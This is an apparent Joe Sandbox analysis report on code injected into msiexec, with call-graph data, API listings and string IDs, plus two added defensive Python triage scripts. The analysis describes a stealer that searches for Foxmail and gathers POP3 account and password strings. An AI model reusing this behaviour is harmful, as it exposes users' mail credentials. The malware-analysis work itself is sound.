6701 22f5693f 6702 22f57011 26 API calls 6701->6702 6703 22f5695b 6702->6703 6704 22f57011 26 API calls 6703->6704 6705 22f56979 6704->6705 6706 22f568a9 6705->6706 6707 22f5571e _free 20 API calls 6705->6707 6708 22f568bd 6706->6708 6707->6706 6725 22f556b9 
RtlLeaveCriticalSection 6708->6725 6710 22f568c7 6710->6697 6712 22f57022 6711->6712 6720 22f5701e 6711->6720 6713 22f57029 6712->6713 6715 22f5703c ___scrt_fastfail 6712->6715 6714 22f56368 __dosmaperr 20 API calls 6713->6714 6716 22f5702e 6714->6716 6718 22f57073 6715->6718 6719 22f5706a 6715->6719 6715->6720 6717 22f562ac ___std_exception_copy 26 API calls 6716->6717 6717->6720 6718->6720 6722 22f56368 __dosmaperr 20 API calls 6718->6722 6721 22f56368 __dosmaperr 20 API calls 6719->6721 6720->6701 6723 22f5706f 6721->6723 6722->6723 6724 22f562ac ___std_exception_copy 26 API calls 6723->6724 6724->6720 6725->6710 6727 22f55468 6726->6727 6728 22f5545a 6726->6728 6729 22f56368 __dosmaperr 20 API calls 6727->6729 6728->6727 6732 22f5547f 6728->6732 6734 22f55470 6729->6734 6730 22f562ac ___std_exception_copy 26 API calls 6731 22f5547a 6730->6731 6731->6236 6732->6731 6733 22f56368 __dosmaperr 20 API calls 6732->6733 6733->6734 6734->6730 6739 22f5500d 6735->6739 6740 22f54fd7 6735->6740 6736 22f55024 6738 22f5571e _free 20 API calls 6736->6738 6737 22f5571e _free 20 API calls 6737->6739 6738->6740 6739->6736 6739->6737 6740->6234 7187 22f55351 7188 22f55360 7187->7188 7192 22f55374 7187->7192 7190 22f5571e _free 20 API calls 7188->7190 7188->7192 7189 22f5571e _free 20 API calls 7191 22f55386 7189->7191 7190->7192 7193 22f5571e _free 20 API calls 7191->7193 7192->7189 7194 22f55399 7193->7194 7195 22f5571e _free 20 API calls 7194->7195 7196 22f553aa 7195->7196 7197 22f5571e _free 20 API calls 7196->7197 7198 22f553bb 7197->7198 6741 22f536d0 6742 22f536f0 @_EH4_CallFilterFunc@8 6741->6742 6743 22f536e2 6741->6743 6744 22f52ada _ValidateLocalCookies 5 API calls 6743->6744 6744->6742 7062 22f53c90 RtlUnwind 6745 22f54bdd 6746 22f54bec 6745->6746 6747 22f54c08 6745->6747 6746->6747 6748 22f54bf2 6746->6748 6749 22f56d60 51 API calls 6747->6749 6751 22f56368 __dosmaperr 20 API calls 6748->6751 6750 22f54c0f GetModuleFileNameA 6749->6750 6752 22f54c33 6750->6752 6753 
22f54bf7 6751->6753 6768 22f54d01 6752->6768 6754 22f562ac ___std_exception_copy 26 API calls 6753->6754 6756 22f54c01 6754->6756 6758 22f54e76 20 API calls 6759 22f54c5d 6758->6759 6760 22f54c66 6759->6760 6761 22f54c72 6759->6761 6762 22f56368 __dosmaperr 20 API calls 6760->6762 6763 22f54d01 38 API calls 6761->6763 6767 22f54c6b 6762->6767 6764 22f54c88 6763->6764 6766 22f5571e _free 20 API calls 6764->6766 6764->6767 6765 22f5571e _free 20 API calls 6765->6756 6766->6767 6767->6765 6770 22f54d26 6768->6770 6772 22f54d86 6770->6772 6774 22f570eb 6770->6774 6771 22f54c50 6771->6758 6772->6771 6773 22f570eb 38 API calls 6772->6773 6773->6772 6777 22f57092 6774->6777 6778 22f554a7 __fassign 38 API calls 6777->6778 6779 22f570a6 6778->6779 6779->6770 7772 22f5281c 7773 22f52882 std::exception::exception 27 API calls 7772->7773 7774 22f5282a 7773->7774 7775 22f52418 7776 22f52420 ___scrt_release_startup_lock 7775->7776 7779 22f547f5 7776->7779 7778 22f52448 7780 22f54804 7779->7780 7781 22f54808 7779->7781 7780->7778 7784 22f54815 7781->7784 7785 22f55b7a __dosmaperr 20 API calls 7784->7785 7788 22f5482c 7785->7788 7786 22f52ada _ValidateLocalCookies 5 API calls 7787 22f54811 7786->7787 7787->7778 7788->7786 5791 22f51c5b 5792 22f51c6b ___scrt_fastfail 5791->5792 5795 22f512ee 5792->5795 5794 22f51c87 5796 22f51324 ___scrt_fastfail 5795->5796 5797 22f513b7 GetEnvironmentVariableW 5796->5797 5821 22f510f1 5797->5821 5800 22f510f1 57 API calls 5801 22f51465 5800->5801 5802 22f510f1 57 API calls 5801->5802 5803 22f51479 5802->5803 5804 22f510f1 57 API calls 5803->5804 5805 22f5148d 5804->5805 5806 22f510f1 57 API calls 5805->5806 5807 22f514a1 5806->5807 5808 22f510f1 57 API calls 5807->5808 5809 22f514b5 lstrlenW 5808->5809 5810 22f514d9 lstrlenW 5809->5810 5820 22f514d2 5809->5820 5811 22f510f1 57 API calls 5810->5811 5812 22f51501 lstrlenW lstrcatW 5811->5812 5813 22f510f1 57 API calls 5812->5813 5814 22f51539 lstrlenW lstrcatW 5813->5814 5815 22f510f1 57 API calls 
                                                                                             Control-flow graph edge data (node ids and "A->B" edges used to render the graph image; the image itself is not reproduced here). Recoverable from the edge list:
                                                                                             • 22F510F1: directory walk (lstrlenW, lstrcatW, FindFirstFileW, FindNextFileW, FindClose) that calls 22F51000 for every entry found.
                                                                                             • 22F51000: builds a path with lstrcatW/lstrlenW, tests it with GetFileAttributesW, hands hits to 22F5173A and continues via 22F511EA.
                                                                                             • 22F5173A -> 22F51CCA: CopyFileW and CreateFileW on the target, GetFileSize, a heap buffer from 22F51EDE (RtlAllocateHeap; on failure a C++ exception via __CxxThrowException@8 -> RaiseException), ReadFile, then CloseHandle and DeleteFileW on the copy; string concatenation (_strcat, _strlen, lstrlenW, lstrcatW) follows in 22F515DA.
                                                                                             • 22F511EA: GetFileAttributesW, 22F5173A, then two further calls into 22F510F1, so the walk is recursive (22F510F1 -> 22F51000 -> 22F511EA -> 22F510F1 forms a cycle).
                                                                                             • The remaining nodes are MSVC runtime code: DllMain dispatch (dllmain_raw, dllmain_dispatch, dllmain_crt_process_attach/detach), heap (RtlAllocateHeap, HeapFree, GetProcessHeap), locks and TLS (RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, TlsGetValue, TlsSetValue, TlsFree), delay-loaded imports (LoadLibraryExW, GetProcAddress, FreeLibrary), security-cookie and fail-fast handling (IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, RtlInterlockedFlushSList), startup (GetCommandLineA, GetCommandLineW) and console/file I/O (WriteFile, WriteConsoleW, GetConsoleCP, GetConsoleMode, WideCharToMultiByte, SetFilePointerEx, SetStdHandle, CloseHandle, GetLastError, SetLastError).

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22F51137
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51151
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5115C
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5116D
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5117C
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51193
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 22F511D0
                                                                                            • FindClose.KERNEL32(00000000), ref: 22F511DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                             • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 1083526818-0
                                                                                            • Opcode ID: 3c019c0c58041275962ac7a3942f701c96184ba22c10df55858aee781caaebe2
                                                                                            • Instruction ID: be7bc7d68c5c4c1e799dd827f7a0d0013993818f9f8dfe7fa6a0b2dc9245260f
                                                                                            • Opcode Fuzzy Hash: 3c019c0c58041275962ac7a3942f701c96184ba22c10df55858aee781caaebe2
                                                                                            • Instruction Fuzzy Hash: 3A21C3725443086BD714EA649C4CF9BBBDCEF84714F000E2AFA58D3190E774D6148796
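                                                                                             The dump file names under Memory Dump Source carry the region's base address and its page attributes. Under the field reading used below, that is what places this code in private, committed RWX memory inside msiexec (the snapshot file name) rather than in a loader-mapped image. The script decodes those names; it is an added example, not part of the Joe Sandbox report or of the analysed sample, and the meaning of each dot-separated field is an assumption inferred from the values matching the Windows MEMORY_BASIC_INFORMATION constants (the third and last fields are left undecoded).

```python
"""Decode the region attributes Joe Sandbox encodes in a memory-dump file name
("Memory Dump Source" lines). Added example, not part of the report. Field meaning is an
assumption inferred from the values matching the Windows MEMORY_BASIC_INFORMATION
constants (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE);
the third field and the trailing field are kept raw because nothing here documents them."""
import re

# Constructed input: the three dump names listed for this function, copied from the report.
DUMP_NAMES = [
    "00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp",
    "00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp",
    "00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp",
]

# Low byte of the protection constant; PAGE_GUARD / PAGE_NOCACHE modifiers live above it.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40, 0x80}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<raw3>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<raw8>[0-9A-Fa-f]{8})\.sdmp$"
)


def decode_sdmp_name(name):
    """Split one sdmp file name into its fields and name the Windows constants."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox sdmp name: {name!r}")
    protect = int(m.group("protect"), 16)
    state = int(m.group("state"), 16)
    mtype = int(m.group("type"), 16)
    return {
        "process_index": int(m.group("proc"), 16),   # 6 here; the snapshot file name says msiexec
        "snapshot": int(m.group("snap"), 16),
        "base": int(m.group("base"), 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "executable": (protect & 0xFF) in EXECUTABLE_PROTECT,
        "state": MEM_STATE.get(state, hex(state)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        "raw_fields": (m.group("raw3"), m.group("raw8")),   # undecoded, kept for the record
    }


def looks_injected(info):
    """Executable, committed memory that is MEM_PRIVATE is not backed by an image section;
    a module the loader mapped would be MEM_IMAGE. Together with 'based on PE: true' this is
    the signature of a manually mapped or injected PE."""
    return info["executable"] and info["state"] == "MEM_COMMIT" and info["type"] == "MEM_PRIVATE"


def describe_module(names):
    """Group the dumps of one module: the lowest base is the PE header page, the rest are sections."""
    infos = sorted((decode_sdmp_name(n) for n in names), key=lambda i: i["base"])
    lines = []
    for i in infos:
        role = "header" if i is infos[0] else f"+0x{i['base'] - infos[0]['base']:X}"
        flag = " <- injected code?" if looks_injected(i) else ""
        lines.append(f"{i['base']:#018x} {role:>8} {i['protect']:<24} {i['type']}{flag}")
    return lines


if __name__ == "__main__":
    print("\n".join(describe_module(DUMP_NAMES)))
```

                                                                                             The header page at 22F50000 is PAGE_READWRITE and the pages at +0x1000 and +0x16000 are PAGE_EXECUTE_READWRITE, the layout a manual PE mapper produces when it applies section protections itself; a loader-mapped DLL would show MEM_IMAGE instead.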

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22F51434
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22F51137
                                                                                              • Part of subcall function 22F510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51151
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5115C
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5116D
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5117C
                                                                                              • Part of subcall function 22F510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51193
                                                                                              • Part of subcall function 22F510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22F511D0
                                                                                              • Part of subcall function 22F510F1: FindClose.KERNEL32(00000000), ref: 22F511DB
                                                                                            • lstrlenW.KERNEL32(?), ref: 22F514C5
                                                                                            • lstrlenW.KERNEL32(?), ref: 22F514E0
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F5150F
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F51521
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F51547
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F51553
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F51579
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F51585
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F515AB
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F515B7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                             • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                            • API String ID: 672098462-2938083778
                                                                                            • Opcode ID: 7860d3671a3b020a5caab5ad31f3db5f6f71ecbad6c3a36c344b7cd45e4a97cb
                                                                                            • Instruction ID: 1276d95d585f78453803aed99ae2322b6f019f056a3e33714ca7ebb7cc95aec6
                                                                                            • Opcode Fuzzy Hash: 7860d3671a3b020a5caab5ad31f3db5f6f71ecbad6c3a36c344b7cd45e4a97cb
                                                                                            • Instruction Fuzzy Hash: 7381B571A4035CA9EB24DBA4DC85FEF737AEF84710F000596F608E71A0EAB15A94CF95
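                                                                                             The API listing for this routine is the readable record of what it does: resolve %ProgramFiles% with GetEnvironmentVariableW, append a fixed name (the String ID line carries "Foxmail"), and enumerate the result with FindFirstFileW/FindNextFileW through the 22F510F1 directory walker. Parsing these listings instead of reading them by eye scales to the hundreds of functions a report like this contains. The following is an added example, not part of the Joe Sandbox report or of the sample; its input is copied from the listing above, and the triage heuristic, including the list of mail-client names, is this example's own assumption.

```python
"""Parse the per-function "APIs" listing Joe Sandbox prints under each Control-flow Graph,
recover the call order and the arguments it resolved to strings, and apply a small triage
heuristic. Added example, not part of the report; the sample input is copied from the
22F51434 entry and the heuristic (and its mail-client name list) is an assumption of this
example, not something the report states."""
import re
from collections import OrderedDict

# Constructed input: lines copied from the 22F51434 listing and its "String ID" line.
SAMPLE_LISTING = """\
APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22F51434
  • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22F51137
  • Part of subcall function 22F510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51151
  • Part of subcall function 22F510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51193
  • Part of subcall function 22F510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22F511D0
  • Part of subcall function 22F510F1: FindClose.KERNEL32(00000000), ref: 22F511DB
• lstrlenW.KERNEL32(?), ref: 22F514C5
• lstrcatW.KERNEL32(00000000), ref: 22F51521
Strings
• String ID: )$Foxmail$ProgramFiles
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")
RAW_DWORD_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Assumption of this example: program names whose presence beside a directory walk is worth a look.
MAIL_CLIENT_HINTS = {"Foxmail", "Thunderbird", "Outlook"}


def parse_api_listing(text):
    """One dict per call line: api, module, args, ref, and the subcall function (or None)."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue                      # section headers and the String ID line are skipped
        args = m.group("args").split(",") if m.group("args") else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "sub": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def parse_string_ids(text):
    """The '$'-separated strings of the 'String ID' line (the sandbox's per-function string set)."""
    for line in text.splitlines():
        m = STRING_ID_RE.match(line)
        if m:
            return [s for s in m.group("ids").split("$") if s]
    return []


def api_sequence(calls, include_subcalls=True):
    """Ordered, de-duplicated API names in the order the listing gives them."""
    seq = OrderedDict()
    for c in calls:
        if c["sub"] is None or include_subcalls:
            seq.setdefault(c["api"], None)
    return list(seq)


def literal_args(calls):
    """Arguments the sandbox resolved to a string rather than '?' or a raw 32-bit value."""
    return sorted({a for c in calls for a in c["args"] if a != "?" and not RAW_DWORD_RE.match(a)})


def classify(calls, string_ids):
    """Heuristic: environment lookup plus wildcard enumeration is the shape of a
    'find the installed program's data directory' walk; a mail-client name sharpens it."""
    apis = set(api_sequence(calls))
    findings = []
    if apis & {"GetEnvironmentVariableW", "GetEnvironmentVariableA"} and apis & {"FindFirstFileW", "FindFirstFileA"}:
        findings.append("env-lookup+file-enumeration")
    if "ProgramFiles" in literal_args(calls):
        findings.append("path built from %ProgramFiles%")
    findings.extend(f"mail client string: {s}" for s in string_ids if s in MAIL_CLIENT_HINTS)
    return findings


if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE_LISTING)
    print(" -> ".join(api_sequence(calls)))
    print(classify(calls, parse_string_ids(SAMPLE_LISTING)))
```

                                                                                             The "Part of subcall function 22F510F1:" prefix is how the sandbox attributes the Find* calls to the directory walker rather than to 22F51434 itself, so the parser keeps the callee address instead of flattening it; api_sequence(calls, include_subcalls=False) gives the calls made directly by the function.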
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 22F561DA
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 22F561E4
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 22F561F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 28b0df5d043972aa0e3a5f1e36be202f67f1afb0b03e044d6b82a0cfe6dbd85f
                                                                                            • Instruction ID: 338ab0b760e839b35040bdd59a192c38bf6a329565a5e1256401ebb9b6ece255
                                                                                            • Opcode Fuzzy Hash: 28b0df5d043972aa0e3a5f1e36be202f67f1afb0b03e044d6b82a0cfe6dbd85f
                                                                                            • Instruction Fuzzy Hash: C631F37594131CABCB25DF28D98878DBBB8EF08710F1042DAE91CA7250E7749B918F44
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000,?,22F52082,22F62108,0000000C,22F51F3A,?), ref: 22F54AD5
                                                                                            • TerminateProcess.KERNEL32(00000000,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000,?,22F52082,22F62108,0000000C,22F51F3A,?), ref: 22F54ADC
                                                                                            • ExitProcess.KERNEL32 ref: 22F54AEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 7d9991dd24593b1a7d4ec606c21e77a80b3edd64651695d2584850fce2679b9a
                                                                                            • Instruction ID: 8d4c38c03210a54dca2ab7eefed8d14c1ed01479c27dd527c5f5618994ce88f7
                                                                                            • Opcode Fuzzy Hash: 7d9991dd24593b1a7d4ec606c21e77a80b3edd64651695d2584850fce2679b9a
                                                                                            • Instruction Fuzzy Hash: 7DE04636001308AFCF096F28CE08A497F2AFF00B41B004410FE059B029DB39D972DA44
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 26f269b3106a01a61c73adae8f0cd710cefd4072d460a8021bdbef58b50f6e63
                                                                                            • Instruction ID: 6a9139ae2166b15acf5dbf438af146e9e7c89ee7b833fb109248f7ac15170aca
                                                                                            • Opcode Fuzzy Hash: 26f269b3106a01a61c73adae8f0cd710cefd4072d460a8021bdbef58b50f6e63
                                                                                            • Instruction Fuzzy Hash: 42A011302822038F83888E38820A20CBAACAA00A80B000828EC28C808CEB2880208B00

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 22F51CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D1B
                                                                                              • Part of subcall function 22F51CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22F51D37
                                                                                              • Part of subcall function 22F51CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D4B
                                                                                            • _strlen.LIBCMT ref: 22F51855
                                                                                            • _strlen.LIBCMT ref: 22F51869
                                                                                            • _strlen.LIBCMT ref: 22F5188B
                                                                                            • _strlen.LIBCMT ref: 22F518AE
                                                                                            • _strlen.LIBCMT ref: 22F518C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                            • API String ID: 3296212668-3023110444
                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction ID: 96ed233846fef91fa83077e29e5330e8005921760be342a00a454e8fad7e5d05
                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction Fuzzy Hash: 4B61D271D00318BBEF198BA4C950BDFB7BBAF55304F00415AD704A7261EB746A65CF92

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                            • API String ID: 4218353326-230879103
                                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                            • Instruction ID: b7d437f08d2f47e80ef8dce6fc2f8ba4a851b49c16ca79e06238eb30fdd7cfe9
                                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                            • Instruction Fuzzy Hash: 427106B1D003286BDF159BB49D84AEF7BFE9F15304F104096EB44E7242E674A795CBA0

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 203 22f57cc2-22f57cd6 204 22f57d44-22f57d4c 203->204 205 22f57cd8-22f57cdd 203->205 206 22f57d93-22f57dab call 22f57e35 204->206 207 22f57d4e-22f57d51 204->207 205->204 208 22f57cdf-22f57ce4 205->208 216 22f57dae-22f57db5 206->216 207->206 209 22f57d53-22f57d90 call 22f5571e * 4 207->209 208->204 211 22f57ce6-22f57ce9 208->211 209->206 211->204 214 22f57ceb-22f57cf3 211->214 217 22f57cf5-22f57cf8 214->217 218 22f57d0d-22f57d15 214->218 222 22f57dd4-22f57dd8 216->222 223 22f57db7-22f57dbb 216->223 217->218 224 22f57cfa-22f57d0c call 22f5571e call 22f590ba 217->224 220 22f57d17-22f57d1a 218->220 221 22f57d2f-22f57d43 call 22f5571e * 2 218->221 220->221 226 22f57d1c-22f57d2e call 22f5571e call 22f591b8 220->226 221->204 227 22f57df0-22f57dfc 222->227 228 22f57dda-22f57ddf 222->228 230 22f57dd1 223->230 231 22f57dbd-22f57dc0 223->231 224->218 226->221 227->216 240 22f57dfe-22f57e0b call 22f5571e 227->240 237 22f57de1-22f57de4 228->237 238 22f57ded 228->238 230->222 231->230 233 22f57dc2-22f57dd0 call 22f5571e * 2 231->233 233->230 237->238 245 22f57de6-22f57dec call 22f5571e 237->245 238->227 245->238
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 22F57D06
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F590D7
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F590E9
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F590FB
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5910D
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5911F
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59131
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59143
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59155
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59167
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59179
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5918B
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5919D
